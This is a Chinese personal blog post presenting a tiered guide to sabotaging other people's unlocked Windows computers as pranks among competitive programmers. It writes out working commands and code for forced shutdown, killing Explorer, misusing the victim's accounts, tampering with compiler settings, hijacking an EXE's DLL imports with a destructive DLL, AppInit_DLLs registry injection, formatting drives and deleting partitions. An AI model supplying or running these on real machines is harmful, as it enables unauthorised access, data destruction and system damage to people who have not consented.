<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/Creeper-32px.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/Creeper-16px.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.css">
  <script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.js"></script>

<script src="/js/runcode.js"></script>

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"movetoex.github.io","root":"/","images":"/images","scheme":"Pisces","version":"8.0.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":true,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}};
  </script>

  <meta name="description" content="当你身边的人出去时没有锁电脑……">
<meta property="og:type" content="article">
<meta property="og:title" content="「长期更新」 如何优雅地机惨别人 for Win">
<meta property="og:url" content="https://movetoex.github.io/posts/b871c09cf73bca69/index.html">
<meta property="og:site_name" content="MoveToEx&#39;s Blog">
<meta property="og:description" content="当你身边的人出去时没有锁电脑……">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2019-05-02T01:28:42.000Z">
<meta property="article:modified_time" content="2020-04-24T11:38:50.622Z">
<meta property="article:author" content="MoveToEx">
<meta property="article:tag" content="极致毒瘤">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://movetoex.github.io/posts/b871c09cf73bca69/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>「长期更新」 如何优雅地机惨别人 for Win | MoveToEx's Blog</title>
  






  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

<style type="text/css">
.spoiler {
  display: inline-flex;
}
p.spoiler {
  display: flex;
}
.spoiler a {
  pointer-events: none;
}
.spoiler-blur, .spoiler-blur > * {
  transition: text-shadow .5s ease;
}
.spoiler .spoiler-blur, .spoiler .spoiler-blur > * {
  color: rgba(0, 0, 0, 0);
  background-color: rgba(0, 0, 0, 0);
  text-shadow: 0 0 10px grey;
  cursor: pointer;
}
.spoiler .spoiler-blur:hover, .spoiler .spoiler-blur:hover > * {
  text-shadow: 0 0 5px grey;
}
.spoiler-box, .spoiler-box > * {
  transition: color .5s ease,
  background-color .5s ease;
}
.spoiler .spoiler-box, .spoiler .spoiler-box > * {
  color: black;
  background-color: black;
  text-shadow: none;
}</style><!-- hexo-inject:begin --><!-- hexo-inject:end --></head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">MoveToEx's Blog</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">MoveToEx IS JURUO!</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <section class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#修改BIOS"><span class="nav-number">1.</span> <span class="nav-text">修改BIOS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#魔改EXE"><span class="nav-number">2.</span> <span class="nav-text">魔改EXE</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#魔改注册表"><span class="nav-number">3.</span> <span class="nav-text">魔改注册表</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#格式化"><span class="nav-number">4.</span> <span class="nav-text">格式化</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#删除分区"><span class="nav-number">5.</span> <span class="nav-text">删除分区</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#删除引导"><span class="nav-number">6.</span> <span class="nav-text">删除引导</span></a></li></ol></div>
        </section>
        <!--/noindex-->

        <section class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="MoveToEx"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">MoveToEx</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">23</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">19</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">25</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/MoveToEx" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;MoveToEx" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:movetoex@outlook.com" title="E-Mail → mailto:movetoex@outlook.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.luogu.com.cn/user/94507" title="Luogu → https:&#x2F;&#x2F;www.luogu.com.cn&#x2F;user&#x2F;94507" rel="noopener" target="_blank"><i class="fa fa-code fa-fw"></i>Luogu</a>
      </span>
  </div>
  <div class="cc-license site-overview-item animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-nd.svg" alt="Creative Commons"></a>
  </div>



        </section>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

  <a href="https://github.com/MoveToEx" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">
      

      

  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://movetoex.github.io/posts/b871c09cf73bca69/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="MoveToEx">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="MoveToEx's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          「长期更新」 如何优雅地机惨别人 for Win
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2019-05-02 09:28:42" itemprop="dateCreated datePublished" datetime="2019-05-02T09:28:42+08:00">2019-05-02</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2020-04-24 19:38:50" itemprop="dateModified" datetime="2020-04-24T19:38:50+08:00">2020-04-24</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E7%81%8C%E6%B0%B4%E5%8C%BA/" itemprop="url" rel="index"><span itemprop="name">灌水区</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>当你身边的人出去时没有锁电脑……</p>
<a id="more"></a>
<p>[2019/08/03] Upd: 做了一些补充，顺便加上liuzhe被机惨的几次（大雾<br>[2019/08/13] Upd: 增加关于PE头的内容，并将本文列为LTS。<br>[2020/04/24] Upd: 增加关于BIOS的内容</p>
<div class="note warning">声明：本页所有操作引发的后果(包括但不限于被核平、自己被机惨、电脑硬件损坏等)，与本人无关。</div><br>本页所有方法均在Windows平台上测试通过 <del>（在平时的机惨中</del><br><br># 「毒瘤I级」<br><br>## 关机<br><br>当他在写一些毒瘤的东西但是<strong>没有保存</strong>的话，这个方法会很有用。<br><br><figure class="highlight bat"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shutdown -f -p</span><br></pre></td></tr></table></figure><br><br>随手<kbd>Ctrl</kbd>+<kbd>S</kbd>以预防。<br><br>顺便说一下这个对VSC及Notepad++之类的没用<br><br>## 杀explorer<br><br>终止资源管理器，配合<kbd><i class="fa fa-windows"></i></kbd>+<kbd>D</kbd>使用更佳。<br><br><figure class="highlight bat"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">taskkill</span> /im explorer.exe /f</span><br></pre></td></tr></table></figure><br><br>可通过<kbd><i class="fa fa-windows"></i></kbd>+<kbd>R</kbd> <code>explorer.exe</code>解决。<br><br>## 账号<br><br>最常见的机惨手段<br>不说了吧<br><br>用他的账号比如洛咕或者QQ啥的做一些奇奇怪怪的事情……比如<code>I AK IOI</code>啥的<br><br>一般 <del>经常机惨别人或经常被机惨</del> 的OIer都会对此种机惨方式有所防范。<br><br>&gt; 我最强了<br>&gt;<br>&gt; <p style="text-align: right">–被机惨的Herself32</p><br><br>&gt; 我tql<br>&gt;<br>&gt; <p style="text-align: right">–被机惨的Payphone-X</p><br><br>&gt; wtxdy<br>&gt;<br>&gt; <p style="text-align: right">–被机惨的MoveToEx菜鸡</p><br><br>&gt; iakioi<br>&gt; I AK IOI!<br>&gt; IAKIOI<br>&gt; wtxdy<br>&gt;<br>&gt; <p style="text-align: right">–被机惨的liuhe</p><br><br>&gt; I AK IOI!<br>&gt;<br>&gt; <p style="text-align: right">–被机惨的机房某同学</p><br><br><br>各位离开电脑的时候一定要锁电脑（<br>一般一个OIer发送<code>wtxdy</code>或<code>I AK IOI</code>所用时间不超过5s<br><br>没啥好办法预防<br>注意锁电脑和账户<br><br># 「毒瘤II级」<br><br>## 魔改编译器<br><br>### Dev-C++<br><br>点开 工具-&gt;编译选项 ，勾选”在编译时加入以下命令”，然后……<br><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">--help</span><br></pre></td></tr></table></figure><br><br>如果你比较毒瘤……<br><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">-Dmain&#x3D;mian</span><br><span class="line">-Dwmain&#x3D;wmian</span><br><span class="line">-DWinMain&#x3D;WinMian</span><br><span class="line">-DwWinMain&#x3D;wWinMian</span><br><span class="line">-DONLINE_JUDGE</span><br></pre></td></tr></table></figure><br><br>比较不容易被发现<br>但会暴露在下方输出框的编译命令里<br><br>### VSCode<br><br>各扩展提供的编译方式不同，请自行更改，在此以AIO Compiler 2.0.0为例<br><br>文件:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%USERPROFILE%\\.vscode\\extensions\\aztechcorps.aio-compiler-2.0.0\\extension.js</span><br></pre></td></tr></table></figure><br><br>第 24~28 行:<br><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">"compile"</span>: &#123;</span><br><span class="line">    <span class="string">"c"</span>: <span class="string">`gcc -o .output<span class="subst">$&#123;pathDelimiter&#125;</span>main -lm `</span>,</span><br><span class="line">    <span class="string">"cpp"</span>: <span class="string">`g++ -o .output<span class="subst">$&#123;pathDelimiter&#125;</span>main `</span>,</span><br><span class="line">    <span class="string">"java"</span>: <span class="string">"javac -d \".output\" "</span></span><br><span class="line">&#125;,</span><br></pre></td></tr></table></figure><br><br>可能稍有不同<br>这是编译的命令<br>自己魔改吧<br><br>VS的话就算了<br>MSBuild不是一般OIer会改的<br>我更不会（<br><br>## 魔改头文件<br><br>按住Ctrl，点击他包括的最后一个头文件，在末尾加入本站<a href="/duliu/Programs/JC-Header.html">毒瘤/机惨标头</a>中的代码。<br>对于万能头(<code>&lt;bits/stdc++.h&gt;</code>)尤其好用<br><br>对VS和VSC及<strong>比较现代</strong>的编辑器不适用，因为这些编辑器都能够分析代码并给出提示<br>只要把光标放在宏的位置……<br><br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">int</span> len = <span class="built_in">strlen</span>(<span class="string">"MoveToEx is juruo!"</span>);</span><br><span class="line">              ┌────────────────────────┐</span><br><span class="line">    <span class="built_in">cout</span> &lt;&lt; le│ <span class="meta">#<span class="meta-keyword">define</span> strlen(x) -1   │</span></span><br><span class="line">              ├────────────────────────┤</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; │ Expands to:            │</span><br><span class="line">&#125;             │ <span class="number">-1</span>                     │</span><br><span class="line">              └────────────────────────┘</span><br></pre></td></tr></table></figure><br><br><br>可通过换用VSC或VS解决（大雾<br><br>## 魔改其他文件<br><br>曾经Handwer太阳被机惨的时候用户密码被删了，博客也被改了<br><br>&gt; 折腾了一个中午才恢复过来<br>&gt;<br>&gt; <p style="text-align: right">–HandwerSTD</p><br><br>或者把他桌面的快捷方式改一下<br>改成指向<code>shutdown -p -f</code>，把图标改到原来的图标<br><br>但是不保证没人会像我一样毒瘤<br>我的桌面图标基本上是拿来看的<br>一般用Wox+开始+任务栏<br>（Wox大法好啊<br><br>同样，记得锁电脑<br><br># 「毒瘤III级」<br><br><div class="note warning">以下内容被WL带师认为是迫害，请自行把握尺度，避免被核平</div>

<p>如果关系没有好到一定程度的话<strong>请勿尝试</strong></p>
<h2 id="修改BIOS"><a href="#修改BIOS" class="headerlink" title="修改BIOS"></a>修改BIOS</h2><p>首先关机<br>如果没法关的话长按电源键  </p>
<p>然后开机进入BIOS<br>如果不知道是哪个键的话就用手指在<kbd>F1</kbd>-<kbd>F12</kbd>滚几遍就好了<br>有的电脑可能需要按住<kbd>Fn</kbd></p>
<p>然后就作吧<br>BIOS可以禁用无线网络<br>可以设定硬盘密码<br>啥的  </p>
<h2 id="魔改EXE"><a href="#魔改EXE" class="headerlink" title="魔改EXE"></a>魔改EXE</h2><p>emmmmmmm</p>
<p>Windows启动程序时，会从程序中读取一份关于程序从外部引入的标识符(可以是函数及变量名等)的列表(称为<code>PE头</code>)，按照这个列表加载DLL。由于EXE中保存的列表一般不变，这种方式也被称为静态加载  </p>
<p>PE头保存在EXE文件中  </p>
<p>有一种程序，能够读取程序的PE头，并有能力重建和编辑PE头  </p>
<p>只要预先准备好对应的DLL，就能让程序从停止运行到关机再到砍<code>Program Files</code>……  </p>
<p>改哪个程序不需要我说了吧 Dev 颓废工具啥的<br>当然如果被修改的程序要求管理员权限就更有意思了（（（  </p>
<p>编辑PE头推荐<code>LordPE</code>。<br>编译DLL文件推荐<code>Visual Studio</code>系列。<br>(记得Dev好像能编译DLL来的)  </p>
<p>相对隐秘，不易发现<br>但是相对麻烦的多，要求机惨者了解Windows相关技术<br>而且重装被修改的软件即可修复（  </p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;cstdlib&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;Shlobj.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> LIBAPI __declspec(dllexport)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">extern</span> <span class="string">"C"</span> &#123;</span><br><span class="line">    <span class="function">LIBAPI <span class="keyword">void</span> <span class="title">crash</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">int</span> a = <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">int</span> *p = &amp;a;</span><br><span class="line">        p += <span class="number">2333</span>;</span><br><span class="line">        (*p)++;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function">LIBAPI <span class="keyword">void</span> <span class="title">memory_limit</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">while</span> (<span class="number">1</span>) <span class="keyword">new</span> <span class="keyword">int</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function">LIBAPI <span class="keyword">void</span> <span class="title">time_limit</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">while</span> (<span class="number">1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function">LIBAPI <span class="keyword">void</span> <span class="title">kill_explorer</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">while</span> (<span class="number">1</span>) &#123;</span><br><span class="line">            system(<span class="string">"taskkill /im explorer.exe /f"</span>);</span><br><span class="line">            Sleep(<span class="number">1000</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function">LIBAPI <span class="keyword">void</span> <span class="title">shutdown</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        system(<span class="string">"shutdown -p"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function">LIBAPI <span class="keyword">void</span> <span class="title">delete_program_files</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (!IsUserAnAdmin()) &#123;</span><br><span class="line">            crash();</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        system(<span class="string">"del /q \"C:\\Program Files\""</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="魔改注册表"><a href="#魔改注册表" class="headerlink" title="魔改注册表"></a>魔改注册表</h2><p>注册表是个好东西<br>不仅键值目录复杂的让人头疼<br>键值的意义也难以弄清<br>所以注册表可以拿来机惨用，不仅难以确定问题所在，还难以恢复   </p>
<p>比如<br>Windows注册表有一个位置<br>它的值列出了一些DLL文件<br><code>User32.dll</code>会在每一个加载<code>User32.dll</code>的程序运行时加载这些DLL文件并调用<code>DllMain</code>，<code>fdwReason</code>传入<code>DLL_PROCESS_ATTACH</code><br>(该特性在最新版本的Windows不确定是否被保留，Win7实测可行)<br>然后……   </p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">BOOL WINAPI <span class="title">DllMain</span><span class="params">(HINSTANCE hInstDll, DWORD fdwReason, PVOID fImpLoad)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">switch</span>(fdwReason) &#123;</span><br><span class="line">        <span class="keyword">case</span> DLL_PROCESS_ATTACH: &#123;</span><br><span class="line">            MessageBox(<span class="literal">NULL</span>, TEXT(<span class="string">"This program ran into an error."</span>), TEXT(<span class="string">"Error"</span>), MB_ICONERROR);</span><br><span class="line">            ExitProcess(<span class="number">0</span>);     <span class="comment">// 退出进程</span></span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">default</span>: &#123;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>嚄嚄嚄嚄  </p>
<p>这个位置：<br><code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code></p>
<p>[2019/08/03] Upd: 当时手残，<code>HKEY</code>打成<code>HEKY</code>，已修复  </p>
<p>这个位置下的<code>LoadAppInit_DLLs</code>键的值为<code>1</code>的时候，<code>AppInit_DLLs</code>才会生效。<br>这个位置下的<code>AppInit_DLLs</code>键的值指定一个或一组DLL的文件名，用<code>&#39; &#39;</code>或<code>&#39;,&#39;</code>分隔。    </p>
<p>在VM试了一遍，确实能用，不过需要编译时指定运行方的Windows平台，否则会提示找不到<code>vcruntime140.dll</code>啥的……<br>然后就是<code>control</code>，<code>cmd</code>，甚至<code>taskkill</code>一类的东西开启的时候都会加载那个链接库<br>啊当然也包括你自己写的  </p>
<p>倒也有解决方法<br>就是在U盘或者什么地方保存一份注册表的备份，并经常更新（  </p>
<p>[2019/08/03] Upd: 请注意：</p>
<blockquote>
<p>This feature may not be available in future versions of the Windows operating system.<br>(该特性在未来的Windows系统版本中可能不可用(指<code>AppInit_DLLs</code>))</p>
<p style="text-align: right">–<a href="https://support.microsoft.com/en-us/help/197571/working-with-the-appinit-dlls-registry-value" target="_blank" rel="noopener">Microsoft</a></p>
</blockquote>
<h2 id="格式化"><a href="#格式化" class="headerlink" title="格式化"></a>格式化</h2><p>emmmmmmm<br>如果不想被核平解决掉的话请不要尝试  </p>
<p>请在具有管理员权限的Powershell窗口中运行  </p>
<figure class="highlight ps"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">format D: /u /s</span><br><span class="line">format E: /u /s</span><br><span class="line">format F: /u /s</span><br></pre></td></tr></table></figure>
<p>能通过恢复工具找回不少<br>但是如果他毒瘤的要死帮你用弄个37次随机覆写啥的……<br>弄死他</p>
<h2 id="删除分区"><a href="#删除分区" class="headerlink" title="删除分区"></a>删除分区</h2><p>emmmmmmm*2</p>
<figure class="highlight bat"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">diskpart</span><br><span class="line">list disk</span><br><span class="line">select disk <span class="number">0</span></span><br><span class="line">list partition</span><br></pre></td></tr></table></figure>
<p>然后随机挑选一个幸运分区进行delete。   </p>
<p>基本无解</p>
<p>[2019/08/01] Upd<br>有解<br>可以用DiskGenius恢复绝大部分<br>但是文件路径不保证全部正确  </p>
<p>别问我为啥知道（QAQ</p>
<h2 id="删除引导"><a href="#删除引导" class="headerlink" title="删除引导"></a>删除引导</h2><p>不说了<br>不会的就算了<br>别去祸害社会<br>至于那些会的我劝你善良</p>
<p>可通过重装系统解决   </p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>MoveToEx
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://movetoex.github.io/posts/b871c09cf73bca69/" title="「长期更新」 如何优雅地机惨别人 for Win">https://movetoex.github.io/posts/b871c09cf73bca69/</a>
  </li>
  <li class="post-copyright-license">
